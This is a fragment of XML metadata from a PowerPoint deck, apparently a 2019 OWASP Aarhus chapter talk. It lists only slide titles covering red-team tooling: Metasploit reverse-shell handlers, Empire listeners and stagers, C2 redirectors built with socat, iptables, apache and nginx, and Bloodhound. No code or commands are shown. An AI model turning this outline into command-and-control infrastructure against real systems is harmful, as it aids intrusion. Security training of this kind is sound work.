      <vt:lpstr>Prerequisites</vt:lpstr>
      <vt:lpstr>Terms</vt:lpstr>
      <vt:lpstr>Terms cont.</vt:lpstr>
      <vt:lpstr>PowerPoint-præsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-præsentation</vt:lpstr>
      <vt:lpstr>Metasploit Framework</vt:lpstr>
      <vt:lpstr>Armitage for msf</vt:lpstr>
      <vt:lpstr>Metasploit handler/reverse shell</vt:lpstr>
      <vt:lpstr>Metasploit handler/exploit</vt:lpstr>
      <vt:lpstr>Empire</vt:lpstr>
      <vt:lpstr>Empire listener</vt:lpstr>
      <vt:lpstr>Empire stager</vt:lpstr>
      <vt:lpstr>C2 (socat redirector)</vt:lpstr>
      <vt:lpstr>C2 (iptables redirector)</vt:lpstr>
      <vt:lpstr>C2 (apache redirector)</vt:lpstr>
      <vt:lpstr>C2 (apache redirector) cont.</vt:lpstr>
      <vt:lpstr>C2 (nginx redirector)</vt:lpstr>
      <vt:lpstr>Empire profiles</vt:lpstr>
      <vt:lpstr>Empire staging</vt:lpstr>
      <vt:lpstr>Noter</vt:lpstr>
      <vt:lpstr>Bloodhound</vt:lpstr>
      <vt:lpstr>Bloodhound ingestor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OWASP Meeting Aarhus Chapter</dc:title>
  <dc:creator>Dennis Perto (DP)</dc:creator>
  <cp:lastModifiedBy>Dennis Perto (DP)</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-08-22T18:23:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-27T11:01:17Z</dcterms:modified>
</cp:coreProperties>
</file>